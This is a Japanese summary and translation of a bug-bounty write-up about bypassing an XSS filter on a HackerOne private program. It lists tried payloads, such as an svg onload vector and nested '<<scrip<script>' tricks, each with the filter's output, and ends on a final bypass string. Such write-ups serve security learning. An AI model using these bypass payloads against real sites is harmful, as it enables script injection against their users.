How I was able to Bypass XSS Protection on HackerOne’s Private Program からXSSを学ぶ

ソース:

medium.com

脆弱性XSS

 

訳:

HackerOneでいくつかの基本的な脆弱性を見つけようとし。
投稿を書いてインターネット上に公開できる機能がありました。
バグを探していました
そこで私はクロスサイトスクリプティングが、アプリケーションはそれを保護するのに少し十分に強力でした(完全ではありません:p)。

 

 

「><svg/onload=confirm(1);>」 が、ほとんど失敗しました。
その後、アプリケーションが onerror 、 onload 、基本的にはイベント ハンドラーなどの「on」単語を含むすべてのペイロードを削除していることに気づき。

 

次に、 script ペイロードと出力を試し。

 

 

これを回避する方法を考え。
私が使用したペイロードの一部と取得した出力は次のとおりで。

 

input : <<script>alert(l);
output: <>alert(l);

input: <<scr<script>alert(1);
output: alert(1);

 

 

input: <<scr<script>ipt>alert(1);
output: ipt>alert(1);

 

 

input: <<scrip<script>t>alert(1);
output: t>alert(1);

 

 

最後の攻撃は、、、

 

<<scrip<scriptT>alert(1);